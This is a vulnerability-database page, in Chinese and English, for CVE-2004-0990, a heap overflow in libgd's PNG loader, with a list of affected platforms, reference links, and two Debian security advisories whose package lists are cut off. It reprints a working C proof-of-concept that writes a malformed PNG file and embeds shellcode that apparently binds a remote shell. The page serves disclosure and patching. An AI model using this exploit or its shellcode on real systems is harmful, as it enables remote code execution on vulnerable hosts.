CVE-2004-0990
CVSS10.0
发布时间 :2005-03-01 00:00:00
修订时间 :2016-10-17 22:50:31
NMCOEPS    

[原文]Integer overflow in GD Graphics Library libgd 2.0.28 (libgd2), and possibly other versions, allows remote attackers to cause a denial of service and possibly execute arbitrary code via PNG image files with large image rows values that lead to a heap-based buffer overflow in the gdImageCreateFromPngCtx function, a different set of vulnerabilities than CVE-2004-0941.


[CNNVD]GD 'gd_png.c' 整数溢出漏洞(CNNVD-200503-024)

        GD是动态建立图象的图形库实现。
        GD在处理装载PNG图象文件时分配内存函数存在整数溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。
        问题存在gd_png.c文件的gdImageCreateFromPngCtx()函数中,此函数由gdImageCreateFromPng()调用,函数用于装载图象文件到GD数据结构,问题是当对图象分配内存时,由于对输入参数缺少充分检查,可导致整数溢出,精心构建PNG图象,诱使用户访问,可能以进程权限执行任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:gd_graphics_library:gdlib:2.0.22
cpe:/o:trustix:secure_linux:1.5Trustix Secure Linux 1.5
cpe:/a:gd_graphics_library:gdlib:1.8.4
cpe:/a:gd_graphics_library:gdlib:2.0.20
cpe:/a:gd_graphics_library:gdlib:2.0.23
cpe:/a:gd_graphics_library:gdlib:2.0.26
cpe:/a:gd_graphics_library:gdlib:2.0.21
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:trustix:secure_linux:2.2Trustix Secure Linux 2.2
cpe:/a:openpkg:openpkg:current
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/a:gd_graphics_library:gdlib:2.0.27
cpe:/a:gd_graphics_library:gdlib:2.0.1
cpe:/o:gentoo:linuxGentoo Linux
cpe:/a:openpkg:openpkg:2.2OpenPKG 2.2
cpe:/a:gd_graphics_library:gdlib:2.0.15
cpe:/a:openpkg:openpkg:2.1OpenPKG 2.1
cpe:/o:suse:suse_linux:8.1SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:9.0SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8.0SuSE SuSE Linux 8.0
cpe:/a:gd_graphics_library:gdlib:2.0.28
cpe:/o:suse:suse_linux:9.2SuSE SuSE Linux 9.2
cpe:/o:suse:suse_linux:8.2SuSE SuSE Linux 8.2
cpe:/o:suse:suse_linux:9.1SuSE SuSE Linux 9.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9952Integer overflow in GD Graphics Library libgd 2.0.28 (libgd2), and possibly other versions, allows remote attackers to cause a denial of ser...
oval:org.mitre.oval:def:1260Integer Overflow in libgd2
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0990
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0990
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-024
(官方数据源) CNNVD

- 其它链接及资源

http://lists.suse.com/archive/suse-security-announce/2006-Feb/0001.html
(UNKNOWN)  SUSE  SUSE-SR:2006:003
http://marc.info/?l=bugtraq&m=109882489302099&w=2
(UNKNOWN)  BUGTRAQ  20041026 libgd integer overflow
http://marc.info/?l=bugtraq&m=109907605501428&w=2
(UNKNOWN)  UBUNTU  USN-11-1
http://marc.info/?l=bugtraq&m=110055781015402&w=2
(UNKNOWN)  UBUNTU  USN-25-1
http://www.ciac.org/ciac/bulletins/p-071.shtml
(UNKNOWN)  CIAC  P-071
http://www.debian.org/security/2004/dsa-589
(UNKNOWN)  DEBIAN  DSA-589
http://www.debian.org/security/2004/dsa-591
(UNKNOWN)  DEBIAN  DSA-591
http://www.debian.org/security/2004/dsa-601
(UNKNOWN)  DEBIAN  DSA-601
http://www.debian.org/security/2004/dsa-602
(UNKNOWN)  DEBIAN  DSA-602
http://www.mandriva.com/security/advisories?name=MDKSA-2004:132
(UNKNOWN)  MANDRAKE  MDKSA-2004:132
http://www.mandriva.com/security/advisories?name=MDKSA-2006:113
(UNKNOWN)  MANDRIVA  MDKSA-2006:113
http://www.mandriva.com/security/advisories?name=MDKSA-2006:114
(UNKNOWN)  MANDRIVA  MDKSA-2006:114
http://www.mandriva.com/security/advisories?name=MDKSA-2006:122
(UNKNOWN)  MANDRIVA  MDKSA-2006:122
http://www.redhat.com/support/errata/RHSA-2004-638.html
(UNKNOWN)  REDHAT  RHSA-2004:638
http://www.securityfocus.com/bid/11523
(VENDOR_ADVISORY)  BID  11523
http://www.trustix.org/errata/2004/0058
(UNKNOWN)  TRUSTIX  2004-0058
http://xforce.iss.net/xforce/xfdb/17866
(VENDOR_ADVISORY)  XF  gd-png-bo(17866)
https://issues.rpath.com/browse/RPL-939
(UNKNOWN)  CONFIRM  https://issues.rpath.com/browse/RPL-939

- 漏洞信息

GD 'gd_png.c' 整数溢出漏洞
危急 缓冲区溢出
2005-03-01 00:00:00 2005-10-28 00:00:00
远程※本地  
        GD是动态建立图象的图形库实现。
        GD在处理装载PNG图象文件时分配内存函数存在整数溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。
        问题存在gd_png.c文件的gdImageCreateFromPngCtx()函数中,此函数由gdImageCreateFromPng()调用,函数用于装载图象文件到GD数据结构,问题是当对图象分配内存时,由于对输入参数缺少充分检查,可导致整数溢出,精心构建PNG图象,诱使用户访问,可能以进程权限执行任意指令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.boutell.com/gd/

- 漏洞信息 (600)

GD Graphics Library Heap Overflow Proof of Concept Exploit (EDBID:600)
linux local
2004-10-26 Verified
0 n/a
N/A [点击下载]
#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <zlib.h>

#define OUTFILE "britnay_spares_pr0n.png"
#define BS 0x1000
#define ALIGN 0

#define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0)

/*
 * a chunk looks like:
 * [ 4 byte len ]   - just the length of data
 * [ 4 byte id  ]   - identifies chunk data type
 * [ 0+ data    ]   - 
 * [ 4 byte crc ]   - covers the id and data
 */

/* identifies a file as a png */
#define MAJIC_LEN sizeof(png_majic)
u_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a };

/* png id fields */
#define ID_LEN sizeof(png_ihdr_id)
u_char png_ihdr_id[] = { 73, 72, 68, 82 };
u_char png_idat_id[] = { 73, 68, 65, 84 };
u_char png_iend_id[] = { 73, 69, 78, 68 };


/*
 * the iHDR chunk.  image information.
 */
#define IHDR_LEN sizeof(png_ihdr)
struct _png_ihdr {
    uint32_t    len,
                id,
                width,
                height;
    uint8_t     bit_depth,
                color_type,
                compress_meth,
                filter_meth,
                interlace_meth;
    uint32_t    crc;
} __attribute__((packed));
typedef struct _png_ihdr png_ihdr;


/*
 * the iDAT chunk. the compressed data of image.
 */
#define IDAT_LEN sizeof(png_idat)
#define IDAT_DATA_SZ 512
struct _png_idat {
    uint32_t    len,
                id;
    u_char      data[IDAT_DATA_SZ];
    uint32_t    crc;
} __attribute__((packed));
typedef struct _png_idat png_idat;


/*
 * the iEND chunk. contains no data.
 */
#define IEND_LEN sizeof(png_iend)
struct _png_iend {
    uint32_t    len,
                id,
                crc;
} __attribute__((packed));
typedef struct _png_iend png_iend;


/* call them shell code */
#define SHELL_LEN strlen(sc)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";



int main(int argc, char **argv)
{
    int fd = 0, len = 0;
    char    *filename = OUTFILE;
    u_char  buf[BS] = { 0, };
    u_long  retaddr = 0;
    png_ihdr    ihdr;
    png_idat    idat;
    png_iend    iend;

#if 0
    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr > [ outfile ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(argc > 2)
        filename = argv[2];
    sscanf(argv[1], "%lx", &retaddr);
#endif

#define PNG_USER_WIDTH_MAX 1000000L /* 0xf4240 */
    /*
     * setup png headers
     */
    size_t  a,b;
    ihdr.len = htonl(0xd);
    memcpy(&ihdr.id, png_ihdr_id, ID_LEN);
    /*
     * need to play with width and height, and also with color_type. depending
     * on color_type value, rowbytes can be manipulated
     */
    a = ihdr.width = htonl(0x8000);
    b = ihdr.height = htonl(0x10000);
    ihdr.bit_depth = 16;
    ihdr.color_type = 4;
    ihdr.compress_meth = 0x0;
    ihdr.filter_meth = 0x0;
    ihdr.interlace_meth = 0x0;
    ihdr.crc = htonl(crc32(0, (u_char *)&ihdr.id, 17));

    iend.len = 0x0;
    memcpy(&iend.id, png_iend_id, ID_LEN);
    iend.crc = htonl(crc32(0, (u_char *)&iend.id, 4));

    idat.len = htonl(IDAT_DATA_SZ);
    memcpy(&idat.id, png_idat_id, ID_LEN);
    memset(idat.data, 'A', IDAT_DATA_SZ);
    idat.crc = htonl(crc32(0, (u_char *)&idat.id, IDAT_DATA_SZ+4));
    
    /* 
     * create buffer:
     * png id - png ihdr - png idat - png iend
     */
    memcpy(buf, png_majic, MAJIC_LEN);
    len += MAJIC_LEN;
    memcpy(buf+len, &ihdr, IHDR_LEN);
    len += IHDR_LEN;
    memcpy(buf+len, &idat, IDAT_LEN);
    len += IDAT_LEN;
    memcpy(buf+len, &iend, IEND_LEN);
    len += IEND_LEN;

    /* create the file */
    if( (fd = open(filename, O_WRONLY|O_CREAT, 0666)) < 0)
        die("open");
    if(write(fd, buf, len) != len)
        die("write");
    close(fd);
    
    return 0;
}

// milw0rm.com [2004-10-26]
		

- 漏洞信息 (F35208)

dsa-602.txt (PacketStormID:F35208)
2004-12-11 00:00:00
 
advisory,overflow,arbitrary
linux,debian
CVE-2004-0941,CVE-2004-0990
[点击下载]

Debian Security Advisory 602-1 - Wait.. No.. what is this? Even more potential integer overflows have been found in the GD graphics library which were not covered by security advisory DSA 589 and DSA 601. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 602-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
November 29th, 2004                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : libgd2
Vulnerability  : integer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2004-0941 CAN-2004-0990

More potential integer overflows have been found in the GD graphics
library which weren't covered by our security advisory DSA 591.  They
could be exploited by a specially crafted graphic and could lead to
the execution of arbitrary code on the victim's machine.

For the stable distribution (woody) these problems have been fixed in
version 2.0.1-10woody2.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your libgd2 packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2.dsc
      Size/MD5 checksum:      705 1d2cc9219ddb2b7aa2966529cf3bc9a7
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2.diff.gz
      Size/MD5 checksum:     9617 1086d76096e77001fbba0f2a1c6059a8
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1.orig.tar.gz
      Size/MD5 checksum:   436945 43af994a97f3300a1165ca4888176ece

  Alpha architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_alpha.deb
      Size/MD5 checksum:    19612 d8e0f6c33ded095632f70bceff42c902
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_alpha.deb
      Size/MD5 checksum:   134116 337b21a9138da8f5b9ba1b4ccf4760d0
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_alpha.deb
      Size/MD5 checksum:   161990 e48689243cb8cf857aff43f54766b83f
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_alpha.deb
      Size/MD5 checksum:   133478 7635ffe6ed708c1d12ff0aec06cbf1f8

  ARM architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_arm.deb
      Size/MD5 checksum:    16678 9d87fe62796182b01405f09ef4031811
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_arm.deb
      Size/MD5 checksum:   123176 b2684677aa60a8def6a771a3602d3c12
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_arm.deb
      Size/MD5 checksum:   150024 a046e85434b31854f1f5c997e9c3ea27
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_arm.deb
      Size/MD5 checksum:   122514 033146ae522a41a8efdca70f7dc3ecfb

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_i386.deb
      Size/MD5 checksum:    16556 c0c113933c4bb677f4763689942bde11
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_i386.deb
      Size/MD5 checksum:   122904 ea468d664be2a7672f4c5856ef953f56
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_i386.deb
      Size/MD5 checksum:   144664 74eebdfad50dec6c551ca6409646b8e0
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_i386.deb
      Size/MD5 checksum:   122354 b1e823ea997b3665e28dcd5df5d565f0

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_ia64.deb
      Size/MD5 checksum:    19884 1a2a378fa128e54aab768e40c4e8cc17
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_ia64.deb
      Size/MD5 checksum:   151472 6b8055f52467d9c43e38f444dd731c89
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_ia64.deb
      Size/MD5 checksum:   177078 27c0631cef98d8602dfed8b772c2450a
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_ia64.deb
      Size/MD5 checksum:   150532 fb9c8afc9b895967ba3cae6ff2b74452

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_hppa.deb
      Size/MD5 checksum:    17726 beb91da619465a73ab4fc90935f86108
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_hppa.deb
      Size/MD5 checksum:   134078 e99fe164ac8cc74d6c4c9c0d1ecc541a
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_hppa.deb
      Size/MD5 checksum:   158574 2f0566bb2871a391495e42627d7e705a
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_hppa.deb
      Size/MD5 checksum:   133518 2e55dadfe4ea416b0ec74c20680a06eb

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_m68k.deb
      Size/MD5 checksum:    16438 a863dc05c5565f5359881fcc49040aeb
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_m68k.deb
      Size/MD5 checksum:   119870 fe27169e9dc7b3e9413e1f4ebdf9b02b
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_m68k.deb
      Size/MD5 checksum:   141724 70e95f0f20d21c495bdfc8d4dced972d
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_m68k.deb
      Size/MD5 checksum:   119350 152b2d46cf82c97d75bc9ccf51e6ecc6

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_mips.deb
      Size/MD5 checksum:    16444 a152fba2273b6b54ae18448ae67392c2
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_mips.deb
      Size/MD5 checksum:   126318 bb4e835619a3443300586605f16fe4af
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_mips.deb
      Size/MD5 checksum:   155760 002ce559170228161da9caffaf776741
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_mips.deb
      Size/MD5 checksum:   125662 88899f0ae15e1ea2a11fcde9dcab0f4f

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_mipsel.deb
      Size/MD5 checksum:    16368 e344c32a505c139e9789adabddb1c986
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_mipsel.deb
      Size/MD5 checksum:   126540 6f260950974335ad39c57c4350e50b61
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_mipsel.deb
      Size/MD5 checksum:   155890 c8c4dc6d12355235c14e6ede8011e259
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_mipsel.deb
      Size/MD5 checksum:   125878 016b32057da5be715b5ebf7c5b5357a4

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_powerpc.deb
      Size/MD5 checksum:    16890 308133d8ad1da9f48ec94a3f08e70e8f
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_powerpc.deb
      Size/MD5 checksum:   126636 d7690253a70b57bdc0169209b4fd7561
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_powerpc.deb
      Size/MD5 checksum:   152556 65d26bd5c7ef02258bb2b06a28328699
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_powerpc.deb
      Size/MD5 checksum:   125914 55f702e8918e631c1dfb72f1932624f4

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_s390.deb
      Size/MD5 checksum:    17718 e38089edf1722e2cda69ace4423f1fce
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_s390.deb
      Size/MD5 checksum:   126340 bbd375aeda1a9a0caca229c152efcd8e
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_s390.deb
      Size/MD5 checksum:   147102 42d0dc54e0b4b75734b81d5f7c608fc6
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_s390.deb
      Size/MD5 checksum:   125702 8e131f35632284e63eb28ed880a63920

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/libg/libgd2/libgd-tools_2.0.1-10woody2_sparc.deb
      Size/MD5 checksum:    16810 63fd97e9700109cfe69266d49bb47472
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2_2.0.1-10woody2_sparc.deb
      Size/MD5 checksum:   125274 d3055730f788964a930308d6be184b4d
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-dev_2.0.1-10woody2_sparc.deb
      Size/MD5 checksum:   148672 16373aa1fe4f1afcf4e4244910b3bb4f
    http://security.debian.org/pool/updates/main/libg/libgd2/libgd2-noxpm_2.0.1-10woody2_sparc.deb
      Size/MD5 checksum:   124302 ee59db0d17b4222018c166805d02d2b8


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBq0b1W5ql+IAeqTIRAhlJAJ9otS96on/CoR8GqTbhcaiWE32YewCfWK+F
XP5DUA10O4828fwRWuRiF34=
=YsrM
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F35205)

dsa-601.txt (PacketStormID:F35205)
2004-12-11 00:00:00
 
advisory,overflow,arbitrary
linux,debian
CVE-2004-0941,CVE-2004-0990
[点击下载]

Debian Security Advisory 601-1 - More potential integer overflows have been found in the GD graphics library which were not covered by security advisory DSA 589. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 601-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
November 29th, 2004                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : libgd1
Vulnerability  : integer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2004-0941 CAN-2004-0990

More potential integer overflows have been found in the GD graphics
library which weren't covered by our security advisory DSA 589.  They
could be exploited by a specially crafted graphic and could lead to
the execution of arbitrary code on the victim's machine.

For the stable distribution (woody) these problems have been fixed in
version 1.8.4-17.woody4.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your libgd1 packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd_1.8.4-17.woody4.dsc
      Size/MD5 checksum:      707 93634a4d33738a412a0554f49a8b9d40
    http://security.debian.org/pool/updates/main/libg/libgd/libgd_1.8.4-17.woody4.diff.gz
      Size/MD5 checksum:     9965 b3f6bb9f8269f7ac51cff0fc90d6617e
    http://security.debian.org/pool/updates/main/libg/libgd/libgd_1.8.4.orig.tar.gz
      Size/MD5 checksum:   559248 813625508e31f5c205904a305bdc8669

  Alpha architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_alpha.deb
      Size/MD5 checksum:   135268 4081dc6cb206bfc5b1cda52848477db6
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_alpha.deb
      Size/MD5 checksum:   133882 f3fc4248b544b666c9da66802955261e
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_alpha.deb
      Size/MD5 checksum:   112150 bbab42fc652e4b735790d0de813676a2
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_alpha.deb
      Size/MD5 checksum:   111514 d20afbe1269e0e7f56d73a259dac326d

  ARM architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_arm.deb
      Size/MD5 checksum:   123886 8192e767d6bb9ae979ac5b0031bb9b60
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_arm.deb
      Size/MD5 checksum:   123426 bbc5f441b18551da49239c2d496412dc
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_arm.deb
      Size/MD5 checksum:   104492 a8e41e0cf59296301a07c7175681ea83
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_arm.deb
      Size/MD5 checksum:   103866 657a40da6ae0fb0a98ef39359ecf09f4

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_i386.deb
      Size/MD5 checksum:   121370 9f75236cecdc4300281637b7ff0e6f19
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_i386.deb
      Size/MD5 checksum:   120872 6156511cd4f42f6ac1c0ab7f02e4efd7
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_i386.deb
      Size/MD5 checksum:   104316 3b752d25dc603e1c22cfc8c9d3652d39
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_i386.deb
      Size/MD5 checksum:   103768 ce23f2ec399e3b03afd6187f267c5c44

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_ia64.deb
      Size/MD5 checksum:   146000 add35b37fde3258d0bbace805fb53bbc
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_ia64.deb
      Size/MD5 checksum:   145044 4435f6176f328a78ccefdfe577e7ace9
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_ia64.deb
      Size/MD5 checksum:   126062 09461d4fbd83910d2e2d9bf9bb498a32
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_ia64.deb
      Size/MD5 checksum:   124688 e548cf3792b430145297be8cb0fc1148

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_hppa.deb
      Size/MD5 checksum:   132370 6f44ec992062767c437a1eec29a5811f
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_hppa.deb
      Size/MD5 checksum:   131562 947d10314f9ae5ebb330dedcf9114c96
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_hppa.deb
      Size/MD5 checksum:   111716 8ca65c20c5e68f8d78cd77bb4bd065e7
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_hppa.deb
      Size/MD5 checksum:   111198 11f0ed821eef8eae926a001748a6ec03

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_m68k.deb
      Size/MD5 checksum:   119412 64ad2486eaec36a62126c4c236b12b4a
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_m68k.deb
      Size/MD5 checksum:   118876 058c5e042eab276f9c054d63f0cb276e
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_m68k.deb
      Size/MD5 checksum:   102588 b395ac9ab99000983bf8fd48196d5614
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_m68k.deb
      Size/MD5 checksum:   102144 f08e703ec62969f178cf06955149a606

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_mips.deb
      Size/MD5 checksum:   129264 dc786f699111737bfb6f415e61d66553
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_mips.deb
      Size/MD5 checksum:   128468 610ae2712619c7a7614795198a7f4143
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_mips.deb
      Size/MD5 checksum:   106732 335c3345b9d936f144a151e7ee1cb147
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_mips.deb
      Size/MD5 checksum:   106128 ad4974e0dea304ca0026b44d780965d1

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_mipsel.deb
      Size/MD5 checksum:   129454 8f65e73363314e981b49ead4fe377571
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_mipsel.deb
      Size/MD5 checksum:   128600 b07298698afd4415c545d4dba0f0642d
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1_1.8.4-17.woody4_mipsel.deb
      Size/MD5 checksum:   106750 65621045098ed9c1ae14a5ac26d848a3
    http://security.debian.org/pool/updates/main/libg/libgd/libgd1-noxpm_1.8.4-17.woody4_mipsel.deb
      Size/MD5 checksum:   106174 ca5be6fd6631e1af4b5a8413c09152af

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/libg/libgd/libgd-dev_1.8.4-17.woody4_powerpc.deb
      Size/MD5 checksum:   126704 9dc8d2c7e7ac7612d7060c50a9891ff5
    http://security.debian.org/pool/updates/main/libg/libgd/libgd-noxpm-dev_1.8.4-17.woody4_powerpc.deb
      Size/MD5 checksum:   125832 6c46a4587c269ad692f3897617a13cca
